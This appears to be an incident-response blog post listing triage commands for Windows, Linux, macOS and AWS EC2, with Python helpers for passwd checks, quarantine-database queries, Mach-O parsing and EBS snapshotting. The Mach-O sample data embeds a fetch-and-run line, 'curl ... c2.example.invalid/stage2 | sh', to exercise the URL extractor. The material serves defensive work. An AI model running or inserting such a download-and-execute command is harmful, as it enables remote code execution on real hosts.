Initial IR Scoping Process for Windows / Linux / Mac
Recently, I was trying to find some resources to create a simple playbook for IR. However, I've noticed that newer analysts often don't know where to start or what to look for. Available resources were very scattered, deep and detailed, or hard to find. This is my attempt at combining and highlighting things to look for in different OSes during the initial scoping of an infected machine. As I'm sharing my notes, please let me know if there's anything crucial I am missing from this list!
Throughout this process, I read through many blog posts, whitepapers, and videos from the internet and the SANS reading room. Credit goes to the original authors; their original content is listed at the end under Sources/Resources. :)
Windows:
Look for anomalies (unusual processes and services):
ps - PowerShell alias for Get-Process; it is not a native cmd.exe command
taskmgr.exe - Task Manager; displays running processes and services
tasklist - list running processes with PID and memory use
tasklist /svc - map each svchost.exe (and other service hosts) to the services it is carrying
wmic process list full - full process details, including the command line, parent PID and executable path
Unusual files / registry keys:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
Generally those three registry keys hold programs that start automatically at logon, including malware. Query the same keys under HKCU as well: per-user persistence there needs no admin rights, so it is where a lot of commodity malware lands.
Unusual Network Usage:
net view \\localhost - shares exposed by this host
net session - inbound SMB sessions to this host
nbtstat -S - NetBIOS sessions, listed by IP address
netstat -nao - all connections and listening ports with the owning PID; add -b (needs an elevated prompt) to show the executable behind each one
Unusual start up / Scheduled tasks:
msconfig - System Configuration utility; the Services and Startup tabs show what starts at boot and logon (on Windows 8 and later the Startup tab hands off to Task Manager)
schtasks /query /fo LIST /v - every scheduled task with its action, author, and next run time
wmic startup list full - startup entries from the Run keys and the Startup folders
Unusual accounts:
lusrmgr.msc
net user
net localgroup administrators
Event Viewer (eventvwr.msc):
Look for unusual behavior:
Warnings, errors, unexpected system reboots, etc.
Log files missing or cleared: clearing the Security log leaves event ID 1102 behind, and clearing the System log leaves event ID 104, so an attacker who wipes logs usually leaves at least that trace
— — — — — — — — — —
Linux:
Unusual Processes and services:
ps aux - all processes with owner, PID, CPU/memory and command line (BSD syntax; "ps -aux" with the dash is a different, ambiguous form that ps only tolerates)
ps -ef - the same in POSIX syntax, with parent PIDs
lsof -p <pid> - files, sockets and libraries held open by one process
lsof +L1 - open files whose link count is below 1, i.e. deleted from disk but still held open; a classic way to hide a running binary or an active log
Unusual files:
find / -uid 0 -perm -4000 -print - setuid files owned by root (not "files that have root permissions"); an unexpected setuid shell or copy of a system binary is a common backdoor, so compare the list against a known-good build
find / -size +50000k -print - files of roughly 50 MB or more; particularly useful for finding files that may not belong on the system, like movies, games, et al.
Network usage:
ip link | grep PROMISC - interfaces in promiscuous mode (something is sniffing)
netstat -nap - all sockets with the owning PID and program name (ss -tunap on systems where netstat is no longer installed)
arp -a - ARP cache (ip neigh on systems without arp)
Scheduled jobs:
cat /etc/crontab
ls /etc/cron.*
crontab -l -u <user> for each account of interest, or ls /var/spool/cron (Red Hat family) and /var/spool/cron/crontabs (Debian family) - per-user crontabs, which /etc/crontab does not show
systemctl list-timers --all - systemd timers, which replace cron jobs on systemd hosts
Unusual Accounts use:
sort -nk3 -t: /etc/passwd | less - accounts sorted by UID
egrep ':0:' /etc/passwd - accounts with UID 0 (the pattern also matches a GID of 0 in the fourth field, so confirm by eye)
getent passwd | grep ':0:' - the same check, but also covers accounts served from LDAP/NIS that are not in the local file
find / -nouser -print - files whose owner UID no longer has an account (a deleted attacker account, or files from another system)
Log files:
/var/log
/var/log/messages or /var/log/syslog for general system messages, /var/log/auth.log or /var/log/secure for logins and sudo, and journalctl on systemd hosts
Other:
uptime
free
df
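An added example, not from the original notes, that does the account checks above in Python so they can be run against an /etc/passwd pulled off an evidence image rather than only on the live host. It goes slightly beyond the one-liners: besides the second UID 0 account it also reports UIDs shared by several names and service accounts that have been given an interactive shell. The passwd content is constructed; the UID_MIN of 1000 and the list of non-interactive shells are assumptions.

```python
"""Check /etc/passwd for the account anomalies the checklist above looks for."""
import sys

# Constructed sample passwd content with a planted second UID-0 account ("toor")
# and a service account that has been given an interactive shell ("support").
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
jdoe:x:1000:1000:Jane Doe:/home/jdoe:/bin/bash
toor:x:0:0:toor:/root:/bin/bash
support:x:999:999::/var/lib/support:/bin/sh
"""

NON_INTERACTIVE = ("nologin", "false", "sync", "shutdown", "halt")
UID_MIN = 1000   # assumption: matches UID_MIN in /etc/login.defs on most distributions


def parse_passwd(text):
    """Return a list of dicts, one per account; raise on a line that is not 7 colon-separated fields."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line {lineno}: {line!r}")
        name, _pw, uid, gid, gecos, home, shell = fields
        records.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell, "line": lineno})
    return records


def uid0_accounts(records):
    """Accounts other than root that carry UID 0 (full root privilege under another name)."""
    return [r["name"] for r in records if r["uid"] == 0 and r["name"] != "root"]


def duplicate_uids(records):
    """Map UID -> account names for every UID shared by more than one account."""
    by_uid = {}
    for r in records:
        by_uid.setdefault(r["uid"], []).append(r["name"])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def system_accounts_with_shell(records, uid_min=UID_MIN):
    """Service accounts (UID below uid_min, excluding root) that can log in interactively."""
    return [r["name"] for r in records
            if 0 < r["uid"] < uid_min and not r["shell"].endswith(NON_INTERACTIVE)]


def sorted_by_uid(records):
    """Equivalent of sort -nk3 -t: /etc/passwd (stable, so ties keep file order)."""
    return sorted(records, key=lambda r: r["uid"])


def report(text):
    records = parse_passwd(text)
    return {"uid0": uid0_accounts(records), "duplicate_uids": duplicate_uids(records),
            "system_with_shell": system_accounts_with_shell(records),
            "by_uid": [(r["uid"], r["name"], r["shell"]) for r in sorted_by_uid(records)]}


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None   # python check_passwd.py /mnt/evidence/etc/passwd
    text = open(path).read() if path else SAMPLE_PASSWD
    for key, value in report(text).items():
        print(f"{key}: {value}")
```

On a live host, feed it `getent passwd` output instead of the file so LDAP/NIS accounts are covered too, for the same reason the checklist pairs egrep with getent.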
— — — — — — — — — —
Mac:
Unusual Processes and services:
ps -axo user,pid,ppid,%cpu,%mem,start,time,command
Info about app + exe paths:
lsappinfo list
Unusual files: Audit popular locations often populated by malware:
/Library
~/Library
Application Support (under both of the above)
ls -al ~/.* ~/Library /Library ~/Library/Application\ Support /Library/Application\ Support/
ls -al /Users/Shared
ls -al /private/tmp
ls -al $TMPDIR
Persistence:
/Library/LaunchDaemons and /Library/LaunchAgents - third-party daemons (run as root at boot) and agents (run as the logged-in user); the /System/Library copies are Apple's own and SIP-protected
~/Library/LaunchAgents - per-user agents, writable without admin rights, so the most common home for malware persistence
/var/root - root's home directory, so root's own ~/Library/LaunchAgents and shell profile live here
Login Items (Users & Groups in System Preferences on older releases, General > Login Items in System Settings on Ventura and later)
Network usage: Open ports + connections
netstat -na | egrep 'LISTEN|ESTABLISH'
netstat -nap tcp - on macOS -p takes a protocol name, not "program"; use lsof -i -n -P to see which process owns each socket
arp -a
ifconfig
Scheduled jobs:
crontab -l (run as each user of interest; root's crontab is separate)
What's running in a particular user's domain:
launchctl list - services in the current user's domain
sudo launchctl list - services in the system-wide domain
sudo launchctl print user/501 - the domain of UID 501, normally the first local user; check dscl for the other UIDs and repeat
Unusual Accounts use: Return list of users (system + login users)
dscl . list /Users UniqueID
dscl . list /Users UniqueID | grep -v '^_' - console login accounts only (system accounts are prefixed with an underscore)
Previous logged in users / shut down systems
last
Files with an open IPv4/IPv6 (or HP-UX X25) connection, i.e. which process owns which socket:
lsof -i (lowercase i; add -n -P to skip name and port lookups so the listing does not stall on DNS)
Log files: Console.app, or from the shell:
/var/log - system.log, install.log and others
log show --last 1h - the unified log, where most macOS subsystems write since 10.12; the syslog-style files in /var/log only hold part of the picture on modern releases
Other:
top
htop (not built in; install from Homebrew)
Look for any files created or modified since or between a certain time/date:
Last 30 mins: find . -mtime -30m -print (BSD find accepts a unit suffix; -Btime -30m checks creation time instead, and for an exact window use -newermt "<start>" ! -newermt "<end>")
Query the LSQuarantine database to see what items have been downloaded by email clients/browsers (LSQuarantineTimeStamp counts seconds since 2001-01-01 UTC, hence the 978307200 offset to reach the Unix epoch):
sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* 'select LSQuarantineEventIdentifier, LSQuarantineAgentName, LSQuarantineAgentBundleIdentifier, LSQuarantineDataURLString, LSQuarantineSenderName, LSQuarantineSenderAddress, LSQuarantineOriginURLString, LSQuarantineTypeNumber, datetime(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | grep --color '|'
Mdfind query on the quarantine bit:
mdfind com.apple.quarantine
Dump the SystemConfiguration property list to look for malware that tries to hijack the Mac's DNS server settings:
plutil -p /Library/Preferences/SystemConfiguration/preferences.plist
Inspect Mac’s auto proxy setting:
scutil --proxy
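An added example, not part of the original notes, showing the LSQuarantine query from Python, which is handier than the sqlite3 one-liner when the database has been copied off an evidence image. The timestamp conversion is the interesting part: LSQuarantineTimeStamp counts seconds from 2001-01-01 UTC (the Cocoa epoch), so 978307200 seconds are added before SQLite's datetime() sees it. The two download events are constructed, and the table definition is only the subset of the real LSQuarantineEvent schema that the query reads.

```python
"""Query the LaunchServices quarantine database (QuarantineEventsV*) and convert its Cocoa timestamps."""
import datetime as dt
import glob
import os
import sqlite3

COCOA_EPOCH_OFFSET = 978307200   # seconds between 1970-01-01 and 2001-01-01 UTC

# The notes' query, with datetime() so the time of day survives; ordering by timestamp
# lists downloads in the order they happened.
QUERY = """
select LSQuarantineEventIdentifier, LSQuarantineAgentName, LSQuarantineAgentBundleIdentifier,
       LSQuarantineDataURLString, LSQuarantineSenderName, LSQuarantineSenderAddress,
       LSQuarantineOriginURLString, LSQuarantineTypeNumber,
       datetime(LSQuarantineTimeStamp + 978307200, 'unixepoch') as downloadedDate
from LSQuarantineEvent order by LSQuarantineTimeStamp
"""


def cocoa_to_utc(ts):
    """Cocoa/Core Data timestamp (seconds since 2001-01-01 UTC) -> timezone-aware UTC datetime."""
    return dt.datetime.fromtimestamp(ts + COCOA_EPOCH_OFFSET, tz=dt.timezone.utc)


def build_sample_db():
    """In-memory database with the subset of the real LSQuarantineEvent schema the query reads,
    holding two constructed download events inserted out of time order."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""create table LSQuarantineEvent (
        LSQuarantineEventIdentifier text primary key, LSQuarantineTimeStamp real,
        LSQuarantineAgentBundleIdentifier text, LSQuarantineAgentName text,
        LSQuarantineDataURLString text, LSQuarantineSenderName text, LSQuarantineSenderAddress text,
        LSQuarantineTypeNumber integer, LSQuarantineOriginURLString text)""")
    rows = [   # constructed: a Mail attachment two hours after a Safari download
        ("B2C3D4E5-0000-0000-0000-000000000002", 721700000.0, "com.apple.mail", "Mail",
         "https://mail.example.invalid/attachment/invoice.zip", "Accounts Payable", "ap@example.invalid", 2, None),
        ("A1B2C3D4-0000-0000-0000-000000000001", 721692800.0, "com.apple.Safari", "Safari",
         "https://downloads.example.invalid/Installer.dmg", None, None, 0, "https://www.example.invalid/get"),
    ]
    conn.executemany("insert into LSQuarantineEvent values (?,?,?,?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


def open_quarantine_db(path):
    """Open a real QuarantineEventsV* file read-only; a copy taken from the evidence image works the same."""
    return sqlite3.connect(f"file:{os.path.abspath(path)}?mode=ro", uri=True)


def quarantine_events(conn):
    """Run QUERY and return a list of dicts keyed by column name, oldest download first."""
    cur = conn.execute(QUERY)
    cols = [d[0] for d in cur.description]
    return [dict(zip(cols, row)) for row in cur.fetchall()]


if __name__ == "__main__":
    paths = glob.glob(os.path.expanduser("~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV*"))
    conn = open_quarantine_db(paths[0]) if paths else build_sample_db()
    for ev in quarantine_events(conn):
        print(ev["downloadedDate"], ev["LSQuarantineAgentName"], ev["LSQuarantineDataURLString"])
```

The per-file com.apple.quarantine extended attribute (xattr -l) carries the same agent name and a timestamp, so the two can be cross-checked when a downloaded file has since been renamed or moved.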
— — — — — — — — — —
Mac Initial Malware Analysis for binaries:
Tools:
- strings, file, nm, xattr, mdls
- Hex dumpers/editors: hexdump, od, xxd
- Static disassembly: otool; lldb for dynamic debugging
- Hopper, Cutter, Radare2, FLOSS
Basic Initial File Analysis:
Code signed, and by whom?
codesign -dvvvv -r - <file.app>
Does Gatekeeper accept it (valid signature, notarization, certificate not revoked)?
spctl --verbose=4 --assess --type execute <file.app>
Application Bundle Structure
cd <file.app>/Contents
Check out Info.plist and the MacOS + Resources folders
plutil -p Info.plist (CFBundleExecutable names the main binary under MacOS)
Resources Folder:
ls -al
ls -haltF
file <file.ext>
Find extended attributes + permissions
xattr -l <file>
mdls <file> - metadata held by Spotlight + Finder (kMDItemWhereFroms records where a file was downloaded from)
Mach-O Binary
file <file> - thin vs universal (fat) binary, and which architectures it contains
pagestuff <file> -a
nm -m <file>
strings - <file> > ~/Malware/strings.txt (the lone "-" tells Apple's strings to scan the whole file, not just the data section)
otool -L <file> > ~/Malware/libs.txt - linked dynamic libraries
Dump Objective-C class and method names:
otool -oV <file> > ~/Malware/methods.txt
Disassembly:
otool -tV <file> > ~/Malware/disassembly.txt
grep "http" ~/Malware/disassembly.txt ~/Malware/strings.txt
xattr -l <file> - the com.apple.quarantine attribute records the downloading agent and time
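An added example, not from the original notes, that reproduces the first few file/otool/strings steps above in Python so they can be run on a non-Mac analysis box: identify the file by its magic bytes, parse the 64-bit Mach-O header, walk the load commands for linked dylibs (what otool -L prints) and pull printable strings and URLs. The sample Mach-O is constructed by hand from a header and a single LC_LOAD_DYLIB command and is not executable; the URL regex and the minimum string length are assumptions.

```python
"""Triage a Mach-O file without otool: magic, 64-bit header, linked dylibs, strings and URLs."""
import re
import struct
import sys

# First four bytes on disk -> what they mean. x86_64/arm64 binaries are little-endian,
# so MH_MAGIC_64 (0xfeedfacf) appears as CF FA ED FE. Fat headers are big-endian.
MAGIC_BYTES = {
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit little-endian (x86_64/arm64)",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit little-endian",
    b"\xfe\xed\xfa\xcf": "Mach-O 64-bit big-endian",
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit big-endian",
    b"\xca\xfe\xba\xbe": "Mach-O universal (fat) binary, or a Java class file",
}
CPU_TYPES = {0x01000007: "x86_64", 0x0100000c: "arm64", 0x7: "i386", 0xc: "arm"}
FILE_TYPES = {0x2: "MH_EXECUTE", 0x6: "MH_DYLIB", 0x8: "MH_BUNDLE"}
# Load commands that name a dylib, with the LC_REQ_DYLD bit masked off:
# LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, LC_REEXPORT_DYLIB, LC_LOAD_UPWARD_DYLIB
DYLIB_CMDS = {0x0c, 0x18, 0x1f, 0x23}
HEADER64 = struct.Struct("<IiiIIIII")   # magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags, reserved


def identify(data):
    """Classify a file by its first bytes (the cheap part of what `file` does)."""
    if data[:2] == b"#!":
        return "script (" + data[2:data.find(b"\n")].decode(errors="replace").strip() + ")"
    return MAGIC_BYTES.get(data[:4], "unknown (first bytes %s)" % data[:4].hex())


def mach_header(data):
    """Parse the 64-bit little-endian header, the common case on modern Macs."""
    if data[:4] != b"\xcf\xfa\xed\xfe":
        raise ValueError("not a 64-bit little-endian Mach-O: " + identify(data))
    _magic, cputype, _sub, filetype, ncmds, sizeofcmds, flags, _ = HEADER64.unpack_from(data, 0)
    return {"cputype": CPU_TYPES.get(cputype, hex(cputype)), "filetype": FILE_TYPES.get(filetype, hex(filetype)),
            "ncmds": ncmds, "sizeofcmds": sizeofcmds, "flags": flags}


def linked_dylibs(data):
    """Walk the load commands and return the dylib paths (what otool -L prints)."""
    hdr = mach_header(data)
    off, found = HEADER64.size, []
    for _ in range(hdr["ncmds"]):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmd & 0x7fffffff in DYLIB_CMDS:
            name_off = struct.unpack_from("<I", data, off + 8)[0]   # offset of the path within this command
            found.append(data[off + name_off: off + cmdsize].split(b"\x00", 1)[0].decode())
        off += cmdsize
    return found


def printable_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len long, like `strings -`."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def urls(data):
    """Assumed URL shape: scheme, host, optional path; good enough to surface C2 addresses."""
    return sorted(set(re.findall(r"https?://[\w.\-]+(?:/[\w./%?&=#\-]*)?", " ".join(printable_strings(data)))))


def build_sample_macho():
    """Constructed minimal x86_64 Mach-O: header, one LC_LOAD_DYLIB, then string data.
    It is not runnable code, just enough structure for the parsers above."""
    name = b"/usr/lib/libSystem.B.dylib\x00"
    cmdsize = 24 + len(name)
    cmdsize += (-cmdsize) % 8                           # load commands are 8-byte aligned
    cmd = struct.pack("<IIIIII", 0x0c, cmdsize, 24, 0, 0x10000, 0x10000) + name
    cmd += b"\x00" * (cmdsize - len(cmd))
    header = HEADER64.pack(0xfeedfacf, 0x01000007, 3, 0x2, 1, len(cmd), 0x200085, 0)
    payload = b"\x00/bin/sh\x00curl -fsSL http://c2.example.invalid/stage2 | sh\x00"   # constructed strings
    return header + cmd + payload


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_macho()
    print(identify(data))
    if data[:4] == b"\xcf\xfa\xed\xfe":
        print(mach_header(data))
        print("dylibs:", linked_dylibs(data))
    print("urls:", urls(data))
```

For a universal binary the fat header has to be walked first to find each architecture's slice before mach_header applies; lipo -thin or `file` will tell you what is inside.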
— — — — — — — — — — — — — — —
Cloud
Preparation:
- Start a case in TheHive, with the category set to "Cloud"
Response:
- Activate AWS CloudTrail
  - Records the AWS API calls made in the account; the complete log of ALL activity
- Activate AWS Config
  - Managed service providing resource inventory, configuration history, and configuration change notifications
- Use AWS Config in discovery mode
  - Discover the resources existing in the EC2 account and record their configuration, including resources that have since been deleted. This gives a comprehensive snapshot of all resources and their configuration attributes, i.e. a complete inventory.
- Use AWS Config for continuous assessment
  - Generate reports on governance and compliance configuration for AWS resources
- Prepare a network diagram
  - Diagram of the network based on the network interfaces attached to instances
- Document ALL systems connected to the EC2 environment
  - Scan with an external scanning agent
  - Scan with an application testing tool
  - Find application weaknesses that can be exploited
  - Discover injected code and other vulnerabilities that could be exploited
- Capture PCAP files
  - Capture full tcpdump pcap files for each inbound and outbound interface
  - Quickly analyze the PCAP files
- AWS Config -> identify instances
  - Take a snapshot of each instance's EBS volumes. Document the snapshot ID of each.
  - For each snapshot, create a volume. This will be the disk volume used for deep forensic analysis. Make note of the volume ID.
  - If the EC2 site runs in multiple AWS Availability Zones, repeat InstanceID -> SnapshotID -> VolumeID for each zone; an attacker can move between instances with something as simple as PsExec, so do not assume the compromise is confined to one zone.
Depending on severity, different containment choices:
- Suspending system instances
- Building new instances to take over processing
- Waiting for the forensic responders to take action
Follow management's decision on containing the system:
- Prior to suspension or deactivation of servers, capture volatile data (memory, network connections, running processes). It can reveal several types of malicious software or rootkits, each of which may have droppers that reinstall the malware on reboot, which a disk image alone will not show.
- Capture volatile data from each server system
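An added example, not from the SANS guide or the original notes, that scripts the InstanceID -> SnapshotID -> VolumeID chain with the boto3 EC2 client calls describe_instances, create_snapshot, the snapshot_completed waiter and create_volume, tagging every snapshot and volume with the case ID so the evidence can be found (and kept from being deleted) later. FakeEC2, its instance and volume IDs, and the case ID are constructed so the script runs offline; given real instance IDs on the command line it uses boto3 instead, assuming credentials and a region are already configured in the environment.

```python
"""Preserve EC2 evidence: snapshot every EBS volume on the affected instances, then cut a forensic volume from each snapshot."""
import json
import sys


def preserve_instances(ec2, instance_ids, case_id):
    """Return one record per EBS volume: instance, AZ, device, source volume, snapshot, forensic volume."""
    tags = [{"Key": "CaseId", "Value": case_id}, {"Key": "Purpose", "Value": "forensic-evidence"}]
    records = []
    resp = ec2.describe_instances(InstanceIds=list(instance_ids))
    for reservation in resp["Reservations"]:
        for inst in reservation["Instances"]:
            az = inst["Placement"]["AvailabilityZone"]
            for bdm in inst.get("BlockDeviceMappings", []):
                if "Ebs" not in bdm:            # instance-store devices have no EBS volume to snapshot
                    continue
                source = bdm["Ebs"]["VolumeId"]
                snap = ec2.create_snapshot(
                    VolumeId=source,
                    Description=f"{case_id} {inst['InstanceId']} {bdm['DeviceName']}",
                    TagSpecifications=[{"ResourceType": "snapshot", "Tags": tags}])["SnapshotId"]
                ec2.get_waiter("snapshot_completed").wait(SnapshotIds=[snap])
                vol = ec2.create_volume(
                    SnapshotId=snap, AvailabilityZone=az,   # same AZ as the source; the analysis box must be there too
                    TagSpecifications=[{"ResourceType": "volume", "Tags": tags}])["VolumeId"]
                records.append({"instance_id": inst["InstanceId"], "availability_zone": az,
                                "device": bdm["DeviceName"], "source_volume_id": source,
                                "snapshot_id": snap, "volume_id": vol})
    return records


class FakeEC2:
    """Constructed stand-in for boto3.client("ec2") so the chain can be exercised offline.
    Two instances in two AZs, three EBS volumes in total; every ID is made up."""

    def __init__(self):
        self._n = 0
        self.instances = {
            "i-0123456789abcdef0": ("us-east-1a", {"/dev/xvda": "vol-0aaa", "/dev/xvdf": "vol-0bbb"}),
            "i-0fedcba9876543210": ("us-east-1b", {"/dev/xvda": "vol-0ccc"}),
        }
        self.snapshots, self.volumes = {}, {}

    def _new_id(self, prefix):
        self._n += 1
        return f"{prefix}-{self._n:017x}"

    def describe_instances(self, InstanceIds):
        instances = [{"InstanceId": iid, "Placement": {"AvailabilityZone": az},
                      "BlockDeviceMappings": [{"DeviceName": dev, "Ebs": {"VolumeId": vol}}
                                              for dev, vol in vols.items()]}
                     for iid, (az, vols) in self.instances.items() if iid in InstanceIds]
        return {"Reservations": [{"Instances": instances}]}

    def create_snapshot(self, VolumeId, Description, TagSpecifications=None):
        sid = self._new_id("snap")
        self.snapshots[sid] = VolumeId
        return {"SnapshotId": sid}

    def get_waiter(self, name):
        return type("NoWait", (), {"wait": lambda self, **kw: None})()   # real waiter polls until the snapshot completes

    def create_volume(self, SnapshotId, AvailabilityZone, TagSpecifications=None):
        vid = self._new_id("vol")
        self.volumes[vid] = (SnapshotId, AvailabilityZone)
        return {"VolumeId": vid}


if __name__ == "__main__":
    case = sys.argv[1] if len(sys.argv) > 1 else "IR-DEMO-0001"
    if len(sys.argv) > 2:                      # preserve.py <case-id> <instance-id>... : real API
        import boto3                           # assumption: credentials and region already configured
        client, ids = boto3.client("ec2"), sys.argv[2:]
    else:
        client, ids = FakeEC2(), ["i-0123456789abcdef0", "i-0fedcba9876543210"]
    print(json.dumps(preserve_instances(client, ids, case), indent=2))
```

Two caveats worth keeping in mind when running this for real: the forensic volume is created in the source instance's Availability Zone, so the analysis instance must live there too (or the snapshot must be copied) before attach_volume can be used, and a snapshot of a running root volume is only crash-consistent, which is one more reason to capture the volatile data first, as the notes say.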
Sources / Resources:
- https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
- https://www.sentinelone.com/blog/how-malware-persists-on-macos/
- https://www.sentinelone.com/blog/
- https://www.sans.org/reading-room/whitepapers/incident/incident-response-amazon-ec2-first-responders-guide-security-incidents-cloud-36902
- https://www.sans.org/score/checklists